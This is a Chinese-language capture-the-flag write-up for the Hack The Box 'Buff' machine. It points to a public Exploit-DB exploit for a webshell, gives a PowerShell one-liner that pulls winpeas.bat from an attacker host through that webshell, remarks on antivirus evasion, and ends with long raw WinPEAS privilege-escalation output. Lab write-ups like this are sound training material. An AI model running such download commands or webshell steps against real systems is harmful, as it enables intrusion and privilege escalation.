image-20220401175643291
然后8080端口御剑发现upload。
image-20220401175726566
image-20220401175809880
搜索路径得到exp
<https://www.exploit-db.com/exploits/48506>
直接执行获得webshell(这里面应该是有杀软,特征明显的eval会被直接删掉,certutil也不香),然后powershell下载。
powershell%20(new-object%20System.Net.WebClient).DownloadFile(%27http://10.10.16.2/winpeas.bat%27,%27C:\\\\xampp\\\\htdocs\\\\gym\\\\upload\\\\winpeas.bat%27)
winpeas枚举
by carlospolop
/!\\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
WinPEAS should be used for authorized penetration testing and/or educational purposes only.
Any misuse of this software will not be the responsibility of the author or of any other collaborator.
Use it at your own networks and/or with the network owner's permission.
[*] BASIC SYSTEM INFO
[+] WINDOWS OS
[i] Check for vulnerabilities for the OS version with the applied patches
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits>
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 01/04/2022, 00:55:46
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\\Windows
System Directory: C:\\Windows\\system32
Boot Device: \\Device\\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,608 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,973 MB
Virtual Memory: In Use: 1,826 MB
Page File Location(s): C:\\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::7d8e:5228:fa88:6508
[03]: dead:beef::b5ea:c90a:5da:c508
[04]: dead:beef::7d8e:5228:fa88:6508
[05]: dead:beef::8b
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
No Instance(s) Available.
"VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020 "
[i] Possible exploits (<https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat>)
No Instance(s) Available.
MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys)
No Instance(s) Available.
MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
No Instance(s) Available.
MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
No Instance(s) Available.
MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri)
No Instance(s) Available.
MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
No Instance(s) Available.
MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
No Instance(s) Available.
MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
No Instance(s) Available.
MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
No Instance(s) Available.
MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
No Instance(s) Available.
MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
No Instance(s) Available.
MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo)
No Instance(s) Available.
MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys)
No Instance(s) Available.
MS05-055 patch is NOT installed 2K/SP4-APC Data-Free)
No Instance(s) Available.
MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS)
No Instance(s) Available.
MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager)
No Instance(s) Available.
MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
No Instance(s) Available.
MS04-020 patch is NOT installed 2K/SP4-POSIX)
No Instance(s) Available.
MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
No Instance(s) Available.
MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
No Instance(s) Available.
MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
No Instance(s) Available.
MS14-070 patch is NOT installed 2K3/SP2-TCP/IP)
No Instance(s) Available.
MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
No Instance(s) Available.
MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei)
No Instance(s) Available.
MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu)
[+] DATE and TIME
[i] You may need to adjust your local date/time to exploit some vulnerability
01/04/2022
10:35
[+] Audit Settings
[i] Check what is being logged
[+] WEF Settings
[i] Check where are being sent the logs
[+] LAPS installed?
[i] Check what is being logged
[+] LSA protection?
[i] Active if "1"
[+] Credential Guard?
[i] Active if "1" or "2"
[+] WDigest?
[i] Plain-text creds in memory if "1"
[+] Number of cached creds
[i] You need System-rights to extract them
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
CACHEDLOGONSCOUNT REG_SZ 10
[+] UAC Settings
[i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access>
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
EnableLUA REG_DWORD 0x1
[+] Registered Anti-Virus(AV)
displayName=Windows Defender
Checking for defender whitelisted PATHS
[+] PowerShell settings
PowerShell v2 Version:
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine
PowerShellVersion REG_SZ 5.1.17134.1
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
[+] MOUNTED DISKS
[i] Maybe you find something interesting
Caption
C:
[+] ENVIRONMENT
[i] Interesting information?
ALLUSERSPROFILE=C:\\ProgramData
APPDATA=C:\\Users\\shaun\\AppData\\Roaming
CommonProgramFiles=C:\\Program Files\\Common Files
CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files
CommonProgramW6432=C:\\Program Files\\Common Files
COMPUTERNAME=BUFF
ComSpec=C:\\Windows\\system32\\cmd.exe
CurrentLine= 0x1B[33m[+]0x1B[97m ENVIRONMENT
DriverData=C:\\Windows\\System32\\Drivers\\DriverData
E=0x1B[
expl=yes
LOCALAPPDATA=C:\\Users\\shaun\\AppData\\Local
long=false
NUMBER_OF_PROCESSORS=4
OneDrive=C:\\Users\\shaun\\OneDrive
OS=Windows_NT
Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\Users\\shaun\\AppData\\Local\\Microsoft\\WindowsApps
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
Percentage=1
PercentageTrack=19
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_LEVEL=23
PROCESSOR_REVISION=3100
ProgramData=C:\\ProgramData
ProgramFiles=C:\\Program Files
ProgramFiles(x86)=C:\\Program Files (x86)
ProgramW6432=C:\\Program Files
PROMPT=$P$G
PSModulePath=%ProgramFiles%\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules
PUBLIC=C:\\Users\\Public
SystemDrive=C:
SystemRoot=C:\\Windows
TEMP=C:\\Users\\shaun\\AppData\\Local\\Temp
TMP=C:\\Users\\shaun\\AppData\\Local\\Temp
USERDOMAIN=BUFF
USERNAME=shaun
USERPROFILE=C:\\Users\\shaun
windir=C:\\Windows
AP_PARENT_PID=2152
[+] INSTALLED SOFTWARE
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software>
Common Files
Common Files
internet explorer
Internet Explorer
Microsoft.NET
UNP
VMware
Windows Defender
Windows Defender
Windows Defender Advanced Threat Protection
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
windows nt
windows nt
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
Windows Security
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\\xampp
InstallLocation REG_SZ C:\\Program Files\\VMware\\VMware Tools\\
[+] Remote Desktop Credentials Manager
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager>
[+] WSUS
[i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus>
[+] RUNNING PROCESSES
[i] Something unexpected is running? Check for vulnerabilities
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes>
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 104 N/A
smss.exe 364 N/A
csrss.exe 444 N/A
wininit.exe 520 N/A
csrss.exe 540 N/A
winlogon.exe 620 N/A
services.exe 668 N/A
lsass.exe 676 N/A
svchost.exe 804 N/A
fontdrvhost.exe 820 N/A
fontdrvhost.exe 828 N/A
svchost.exe 868 N/A
svchost.exe 952 N/A
svchost.exe 996 N/A
dwm.exe 384 N/A
svchost.exe 396 N/A
svchost.exe 748 N/A
svchost.exe 1048 N/A
svchost.exe 1088 N/A
svchost.exe 1100 N/A
svchost.exe 1232 N/A
svchost.exe 1312 N/A
svchost.exe 1320 N/A
svchost.exe 1328 N/A
svchost.exe 1336 N/A
svchost.exe 1356 N/A
svchost.exe 1464 N/A
Memory Compression 1504 N/A
svchost.exe 1540 N/A
svchost.exe 1632 N/A
svchost.exe 1652 N/A
svchost.exe 1660 N/A
svchost.exe 1752 N/A
svchost.exe 1848 N/A
svchost.exe 1896 N/A
svchost.exe 1936 N/A
svchost.exe 1944 N/A
svchost.exe 1952 N/A
svchost.exe 1964 N/A
svchost.exe 1372 N/A
spoolsv.exe 2136 N/A
svchost.exe 2144 N/A
svchost.exe 2184 N/A
svchost.exe 2232 N/A
svchost.exe 2640 N/A
svchost.exe 2660 N/A
svchost.exe 2668 N/A
SecurityHealthService.exe 2692 N/A
svchost.exe 2700 N/A
svchost.exe 2716 N/A
vmtoolsd.exe 2728 N/A
svchost.exe 2736 N/A
svchost.exe 2752 N/A
VGAuthService.exe 2760 N/A
MsMpEng.exe 2772 N/A
svchost.exe 2788 N/A
svchost.exe 2996 N/A
svchost.exe 3052 N/A
svchost.exe 2724 N/A
dllhost.exe 3572 N/A
WmiPrvSE.exe 3752 N/A
msdtc.exe 4072 N/A
svchost.exe 4252 N/A
sihost.exe 4304 N/A
svchost.exe 4344 N/A
svchost.exe 4420 N/A
taskhostw.exe 4500 N/A
svchost.exe 4620 N/A
ctfmon.exe 4660 N/A
svchost.exe 4736 N/A
explorer.exe 4644 N/A
NisSrv.exe 5600 N/A
svchost.exe 5656 N/A
svchost.exe 5808 N/A
svchost.exe 5868 N/A
svchost.exe 5480 N/A
svchost.exe 5580 N/A
ShellExperienceHost.exe 2276 N/A
SearchUI.exe 6356 N/A
RuntimeBroker.exe 6500 N/A
RuntimeBroker.exe 6748 N/A
ApplicationFrameHost.exe 6792 N/A
SearchIndexer.exe 6860 N/A
MicrosoftEdge.exe 7052 N/A
browser_broker.exe 5464 N/A
svchost.exe 5384 N/A
RuntimeBroker.exe 1984 N/A
Windows.WARP.JITService.e 3920 N/A
RuntimeBroker.exe 7188 N/A
svchost.exe 7336 N/A
MicrosoftEdgeCP.exe 7744 N/A
MicrosoftEdgeCP.exe 7788 N/A
vmtoolsd.exe 7876 N/A
conhost.exe 6076 N/A
httpd.exe 2152 N/A
mysqld.exe 5840 N/A
svchost.exe 2896 N/A
svchost.exe 7284 N/A
httpd.exe 4188 N/A
svchost.exe 2940 N/A
SgrmBroker.exe 6772 N/A
svchost.exe 8064 N/A
svchost.exe 8560 N/A
Microsoft.Photos.exe 8852 N/A
RuntimeBroker.exe 8928 N/A
WinStore.App.exe 4936 N/A
RuntimeBroker.exe 1280 N/A
SystemSettings.exe 2484 N/A
taskhostw.exe 8876 N/A
svchost.exe 2464 N/A
svchost.exe 6372 N/A
svchost.exe 4052 N/A
svchost.exe 2512 N/A
svchost.exe 3064 N/A
cmd.exe 5024 N/A
conhost.exe 8480 N/A
cmd.exe 8124 N/A
conhost.exe 4764 N/A
WmiPrvSE.exe 7152 N/A
CloudMe.exe 9112 N/A
timeout.exe 5988 N/A
tasklist.exe 7248 N/A
[i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in)
C:\\xampp\\apache\\bin\\httpd.exe BUILTIN\\Administrators:(I)(F)
NT AUTHORITY\\Authenticated Users:(I)(M)
C:\\xampp\\mysql\\bin\\mysqld.exe BUILTIN\\Administrators:(I)(F)
NT AUTHORITY\\Authenticated Users:(I)(M)
C:\\xampp\\apache\\bin\\httpd.exe BUILTIN\\Administrators:(I)(F)
NT AUTHORITY\\Authenticated Users:(I)(M)
[i] Checking directory permissions of running processes (DLL injection)
C:\\xampp\\apache\\bin\\ BUILTIN\\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\\Authenticated Users:(I)(M)
NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)
C:\\xampp\\mysql\\bin\\ BUILTIN\\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\\Authenticated Users:(I)(M)
NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)
C:\\xampp\\apache\\bin\\ BUILTIN\\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\\Authenticated Users:(I)(M)
NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)
[+] RUN AT STARTUP
[i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup>
C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\desktop.ini BUILTIN\\Administrators:(F)
C:\\Documents and Settings\\shaun\\Start Menu\\Programs\\Startup NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
BUFF\\shaun:(OI)(CI)(F)
C:\\Documents and Settings\\shaun\\Start Menu\\Programs\\Startup\\desktop.ini NT AUTHORITY\\SYSTEM:(F)
BUFF\\shaun:(F)
C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini BUILTIN\\Administrators:(F)
C:\\Users\\shaun\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
BUFF\\shaun:(OI)(CI)(F)
C:\\Users\\shaun\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini NT AUTHORITY\\SYSTEM:(F)
BUFF\\shaun:(F)
Folder: \\
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows\\.NET Framework
.NET Framework NGEN v4.0.30319 N/A Ready
.NET Framework NGEN v4.0.30319 64 N/A Ready
Folder: \\Microsoft\\Windows\\Active Directory Rights Management Services Client
AD RMS Rights Policy Template Management N/A Ready
Folder: \\Microsoft\\Windows\\AppID
Folder: \\Microsoft\\Windows\\Application Experience
Microsoft Compatibility Appraiser 02/04/2022 04:05:16 Ready
ProgramDataUpdater N/A Ready
StartupAppTask N/A Ready
Folder: \\Microsoft\\Windows\\ApplicationData
appuriverifierdaily N/A Ready
appuriverifierinstall N/A Ready
CleanupTemporaryState N/A Ready
DsSvcCleanup N/A Ready
Folder: \\Microsoft\\Windows\\AppxDeploymentClient
Folder: \\Microsoft\\Windows\\Autochk
Proxy N/A Ready
Folder: \\Microsoft\\Windows\\BitLocker
BitLocker MDM policy Refresh N/A Ready
Folder: \\Microsoft\\Windows\\Bluetooth
UninstallDeviceTask N/A Ready
Folder: \\Microsoft\\Windows\\BrokerInfrastructure
BgTaskRegistrationMaintenanceTask N/A Ready
Folder: \\Microsoft\\Windows\\Chkdsk
ProactiveScan N/A Ready
SyspartRepair N/A Ready
Folder: \\Microsoft\\Windows\\CloudExperienceHost
CreateObjectTask N/A Ready
Folder: \\Microsoft\\Windows\\Customer Experience Improvement Program
Consolidator 01/04/2022 12:00:00 Ready
UsbCeip N/A Ready
Folder: \\Microsoft\\Windows\\Data Integrity Scan
Data Integrity Scan 10/04/2022 12:28:04 Ready
Data Integrity Scan for Crash Recovery N/A Ready
Folder: \\Microsoft\\Windows\\Defrag
ScheduledDefrag N/A Ready
Folder: \\Microsoft\\Windows\\Device Information
Device 02/04/2022 04:39:19 Ready
Folder: \\Microsoft\\Windows\\Diagnosis
Scheduled N/A Ready
Folder: \\Microsoft\\Windows\\DirectX
DXGIAdapterCache N/A Ready
Folder: \\Microsoft\\Windows\\DiskCleanup
SilentCleanup N/A Ready
Folder: \\Microsoft\\Windows\\DiskDiagnostic
Microsoft-Windows-DiskDiagnosticDataColl N/A Ready
Folder: \\Microsoft\\Windows\\DiskFootprint
Diagnostics N/A Ready
StorageSense N/A Ready
Folder: \\Microsoft\\Windows\\DUSM
dusmtask N/A Ready
Folder: \\Microsoft\\Windows\\EDP
EDP App Launch Task N/A Ready
EDP Auth Task N/A Ready
EDP Inaccessible Credentials Task N/A Ready
StorageCardEncryption Task N/A Ready
Folder: \\Microsoft\\Windows\\ExploitGuard
ExploitGuard MDM policy Refresh N/A Ready
Folder: \\Microsoft\\Windows\\Feedback
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows\\Feedback\\Siuf
DmClient N/A Ready
DmClientOnScenarioDownload N/A Ready
Folder: \\Microsoft\\Windows\\File Classification Infrastructure
Folder: \\Microsoft\\Windows\\FileHistory
File History (maintenance mode) N/A Ready
Folder: \\Microsoft\\Windows\\Flighting
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows\\Flighting\\FeatureConfig
ReconcileFeatures N/A Ready
Folder: \\Microsoft\\Windows\\InstallService
ScanForUpdates 02/04/2022 02:52:26 Ready
ScanForUpdatesAsUser N/A Ready
Folder: \\Microsoft\\Windows\\Live
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows\\Location
Notifications N/A Ready
WindowsActionDialog N/A Ready
Folder: \\Microsoft\\Windows\\Maintenance
WinSAT N/A Ready
Folder: \\Microsoft\\Windows\\Management
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows\\Management\\Provisioning
Cellular N/A Ready
Logon N/A Ready
Folder: \\Microsoft\\Windows\\Maps
MapsToastTask N/A Ready
Folder: \\Microsoft\\Windows\\MemoryDiagnostic
ProcessMemoryDiagnosticEvents N/A Ready
RunFullMemoryDiagnostic N/A Ready
Folder: \\Microsoft\\Windows\\Mobile Broadband Accounts
MNO Metadata Parser N/A Ready
Folder: \\Microsoft\\Windows\\MUI
LPRemove N/A Ready
Folder: \\Microsoft\\Windows\\Multimedia
SystemSoundsService N/A Running
Folder: \\Microsoft\\Windows\\NetTrace
GatherNetworkInfo N/A Ready
Folder: \\Microsoft\\Windows\\NlaSvc
WiFiTask N/A Ready
Folder: \\Microsoft\\Windows\\Offline Files
Folder: \\Microsoft\\Windows\\PLA
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows\\Plug and Play
Device Install Group Policy N/A Ready
Device Install Reboot Required N/A Ready
Sysprep Generalize Drivers N/A Ready
Folder: \\Microsoft\\Windows\\Power Efficiency Diagnostics
AnalyzeSystem N/A Ready
Folder: \\Microsoft\\Windows\\Printing
EduPrintProv N/A Ready
Folder: \\Microsoft\\Windows\\RecoveryEnvironment
Folder: \\Microsoft\\Windows\\Servicing
StartComponentCleanup N/A Ready
Folder: \\Microsoft\\Windows\\SettingSync
BackgroundUploadTask N/A Ready
NetworkStateChangeTask N/A Ready
Folder: \\Microsoft\\Windows\\SharedPC
Folder: \\Microsoft\\Windows\\Shell
CreateObjectTask N/A Ready
FamilySafetyMonitor N/A Ready
FamilySafetyRefreshTask N/A Ready
IndexerAutomaticMaintenance N/A Ready
Folder: \\Microsoft\\Windows\\SpacePort
SpaceAgentTask N/A Ready
SpaceManagerTask N/A Ready
Folder: \\Microsoft\\Windows\\Speech
HeadsetButtonPress N/A Ready
Folder: \\Microsoft\\Windows\\Storage Tiers Management
Storage Tiers Management Initialization N/A Ready
Folder: \\Microsoft\\Windows\\Subscription
EnableLicenseAcquisition N/A Ready
Folder: \\Microsoft\\Windows\\Sysmain
ResPriStaticDbSync N/A Ready
WsSwapAssessmentTask N/A Ready
Folder: \\Microsoft\\Windows\\SystemRestore
SR N/A Ready
Folder: \\Microsoft\\Windows\\termsrv
INFO: There are no scheduled tasks presently available at your access level.
Folder: \\Microsoft\\Windows\\termsrv\\RemoteFX
RemoteFXWarningTask 19/04/2022 13:00:00 Ready
Folder: \\Microsoft\\Windows\\TextServicesFramework
MsCtfMonitor N/A Ready
Folder: \\Microsoft\\Windows\\Time Synchronization
ForceSynchronizeTime N/A Ready
SynchronizeTime N/A Ready
Folder: \\Microsoft\\Windows\\Time Zone
SynchronizeTimeZone N/A Ready
Folder: \\Microsoft\\Windows\\UNP
RunUpdateNotificationMgr 02/04/2022 15:52:51 Ready
Folder: \\Microsoft\\Windows\\UPnP
UPnPHostConfig N/A Ready
Folder: \\Microsoft\\Windows\\USB
Usb-Notifications N/A Ready
Folder: \\Microsoft\\Windows\\WCM
WiFiTask N/A Ready
Folder: \\Microsoft\\Windows\\Windows Defender
Windows Defender Cache Maintenance N/A Ready
Windows Defender Cleanup N/A Ready
Windows Defender Scheduled Scan N/A Ready
Windows Defender Verification N/A Ready
Folder: \\Microsoft\\Windows\\Windows Error Reporting
QueueReporting 01/04/2022 11:20:54 Ready
Folder: \\Microsoft\\Windows\\Windows Filtering Platform
BfeOnServiceStartTypeChange N/A Ready
Folder: \\Microsoft\\Windows\\Windows Media Sharing
UpdateLibrary N/A Ready
Folder: \\Microsoft\\Windows\\WindowsColorSystem
Calibration Loader N/A Ready
Folder: \\Microsoft\\Windows\\WindowsUpdate
Scheduled Start N/A Ready
sih 01/04/2022 16:42:15 Ready
Folder: \\Microsoft\\Windows\\Wininet
CacheTask N/A Running
Folder: \\Microsoft\\Windows\\Work Folders
Work Folders Logon Synchronization N/A Ready
Work Folders Maintenance Work N/A Ready
Folder: \\Microsoft\\Windows\\Workplace Join
Folder: \\Microsoft\\Windows\\WwanSvc
NotificationTask N/A Ready
Folder: \\Microsoft\\XblGameSave
XblGameSaveTask N/A Ready
[+] AlwaysInstallElevated?
[i] If '1' then you can install a .msi file with admin privileges ;)
[?] <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated>
[*] NETWORK
[+] CURRENT SHARES
System error 5 has occurred.
Access is denied.
[+] INTERFACES
Windows IP Configuration
Host Name . . . . . . . . . . . . : BUFF
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-69-00
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::8b(Preferred)
Lease Obtained. . . . . . . . . . : 01 April 2022 00:55:59
Lease Expires . . . . . . . . . . : 01 April 2022 10:41:03
IPv6 Address. . . . . . . . . . . : dead:beef::7d8e:5228:fa88:6508(Preferred)
Temporary IPv6 Address. . . . . . : dead:beef::b5ea:c90a:5da:c508(Preferred)
Link-local IPv6 Address . . . . . : fe80::7d8e:5228:fa88:6508%10(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.10.198(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6ca8%10
10.10.10.2
DHCPv6 IAID . . . . . . . . . . . : 218124374
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-D7-F7-E6-00-50-56-B9-69-00
DNS Servers . . . . . . . . . . . : 8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
htb
[+] USED PORTS
[i] Check for services restricted from the outside
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5808
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 2940
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 2152
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1100
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1464
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2136
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 676
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 5840
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 2940
TCP [::]:8080 [::]:0 LISTENING 2152
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 1100
TCP [::]:49666 [::]:0 LISTENING 1464
TCP [::]:49667 [::]:0 LISTENING 2136
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 676
[+] FIREWALL
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Defender Firewall
Remote admin mode = Disable
Ports currently open on all network interfaces:
Port Protocol Version Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at <https://go.microsoft.com/fwlink/?linkid=121488> .
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Domain profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Enable Inbound mysqld / C:\\xampp\\mysql\\bin\\mysqld.exe
Enable Inbound Apache HTTP Server / C:\\xampp\\apache\\bin\\httpd.exe
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Log configuration:
-------------------------------------------------------------------
File location = C:\\Windows\\system32\\LogFiles\\Firewall\\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at <https://go.microsoft.com/fwlink/?linkid=121488> .
[+] ARP
Interface: 10.10.10.198 --- 0xa
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-6c-a8 dynamic
10.10.10.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
[+] ROUTES
===========================================================================
Interface List
10...00 50 56 b9 69 00 ......vmxnet3 Ethernet Adapter
